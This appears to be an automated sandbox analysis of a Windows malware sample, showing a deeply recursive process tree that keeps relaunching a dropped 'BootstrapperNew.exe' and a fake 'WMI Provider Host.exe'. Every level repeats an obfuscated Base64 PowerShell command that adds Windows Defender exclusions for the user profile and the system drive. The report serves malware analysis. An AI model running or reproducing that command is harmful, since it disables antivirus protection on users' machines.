        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3068
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4996
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        7⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1924
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2616
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:884
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        8⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:324
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4092
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1516
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        9⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:4224
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        10⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3632
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1940
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        10⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:1708
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        11⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4880
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1644
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        11⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2676
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        12⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2276
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3428
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        12⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:1752
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        13⤵
        System Location Discovery: System Language Discovery
        
        PID:4996
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:924
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        13⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        14⤵
        
        PID:4548
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        14⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1924
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        14⤵
        
        PID:3320
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        15⤵
        
        PID:3252
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        15⤵
        
        PID:2676
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        15⤵
        
        PID:2852
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        16⤵
        
        PID:776
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        16⤵
        
        PID:3088
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        16⤵
        
        PID:3372
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        17⤵
        
        PID:5332
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        17⤵
        
        PID:5340
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        17⤵
        
        PID:5368
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        18⤵
        
        PID:5676
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        18⤵
        
        PID:5688
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        18⤵
        
        PID:5696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        19⤵
        
        PID:5920
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        19⤵
        
        PID:5944
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        19⤵
        
        PID:6012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        20⤵
        
        PID:5284
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        20⤵
        
        PID:5384
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        20⤵
        
        PID:4488
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        21⤵
        
        PID:5928
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        21⤵
        
        PID:5932
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        21⤵
        
        PID:5696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        22⤵
        
        PID:5528
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        22⤵
        
        PID:3088
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        22⤵
        
        PID:5328
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        23⤵
        
        PID:4380
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        23⤵
        
        PID:4488
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        23⤵
        
        PID:5740
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        24⤵
        
        PID:5704
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        24⤵
        
        PID:5300
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        24⤵
        
        PID:5868
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        25⤵
        
        PID:5504
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        25⤵
        
        PID:4484
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        25⤵
        
        PID:6136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        26⤵
        
        PID:5744
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        26⤵
        
        PID:5644
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        26⤵
        
        PID:5360
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        27⤵
        
        PID:6360
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        27⤵
        
        PID:6368
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        27⤵
        
        PID:6388
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        28⤵
        
        PID:6532
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        28⤵
        
        PID:6548
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        28⤵
        
        PID:6604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        29⤵
        
        PID:6844
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        29⤵
        
        PID:6852
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        29⤵
        
        PID:6884
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        30⤵
        
        PID:7144
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        30⤵
        
        PID:7156
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        30⤵
        
        PID:7164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        31⤵
        
        PID:6344
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        31⤵
        
        PID:5684
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        31⤵
        
        PID:624
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        32⤵
        
        PID:6868
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        32⤵
        
        PID:6756
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        32⤵
        
        PID:6604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        33⤵
        
        PID:6336
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        33⤵
        
        PID:6196
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        33⤵
        
        PID:5164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
